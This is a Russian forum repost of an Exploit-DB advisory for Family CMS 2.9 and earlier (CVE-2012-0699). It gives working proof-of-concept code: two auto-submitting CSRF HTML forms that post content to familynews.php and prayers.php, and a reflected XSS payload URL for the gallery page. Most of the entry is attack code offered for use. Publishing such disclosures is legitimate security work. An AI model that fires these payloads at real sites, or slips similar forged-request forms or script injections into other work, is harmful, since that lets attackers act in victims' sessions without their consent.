Exploit Family CMS 2.9 - Multiple Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
18667
Проверка EDB
  1. Пройдено
Автор
AHMED ELHADY MOHAMED
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2012-0699
Дата публикации
2012-03-26
HTML:
Family CMS 2.9  and earlier multiple Vulnerabilities
===================================================================================
# Exploit Title: Family CMS 2.9  and earlier multiple Vulnerabilities
# Download link :http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.9/FCMS_2.9.zip/download
# Author: Ahmed Elhady Mohamed
# Email : [email protected]
# version: 2.9
# Category: webapps
# Tested on: ubuntu 11.4  
===================================================================================
 
 
 Tips:
	*****First we must install all optional sections during installation process.*****       
	      
1- CSRF Vulnerabilities :

	POC 1: Page "familynews.php"
	     
	   
		<html>
		    <head>
		        <script type="text/javascript">
		            function autosubmit() {
		                document.getElementById('ChangeSubmit').submit();
		            }  
		        </script>
		    </head>
		    <body  onLoad="autosubmit()">
		        <form method="POST"  action="http://[localhost]/FCMS_2.9/familynews.php"  id="ChangeSubmit">
		            <input type="hidden"  name="title"  value="test" />
		            <input type="hidden"  name="submitadd"  value="Add" />
		            <input type="hidden"  name="post"  value="testcsrf" />
		            <input type="submit" value="submit"/>
		        </form>
		    </body>
		</html>
	 
	 --------------------------------------------------------------------------------------------------------
	    
	 POC 2:Page "prayers.php"
	    

	      <html>
		<head>
		    <script type="text/javascript">
		        function autosubmit() {
		            document.getElementById('ChangeSubmit').submit();
		        }  
		    </script>
		</head>
		<body  onLoad="autosubmit()">
		    <form method="POST"  action="http://[localhost]/FCMS_2.9/prayers.php" id="ChangeSubmit">
		        <input type="hidden"  name="for"  value="test" />
		        <input type="hidden"  name="submitadd"  value="Add" />
		        <input type="hidden"  name="desc"  value="testtest" />
		        <input type="submit" value="submit"/>
		    </form>
		 
		</body>
	    </html>
----------------------------------------------------------------------------------------------------------------------------
2-Reflected XSS
	
	POC :   http://[localhost]/fcms_2.9/gallery/index.php?uid=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E

-----------------------------------------------------------------------------------------------------------------------------
 
Источник
www.exploit-db.com

Похожие темы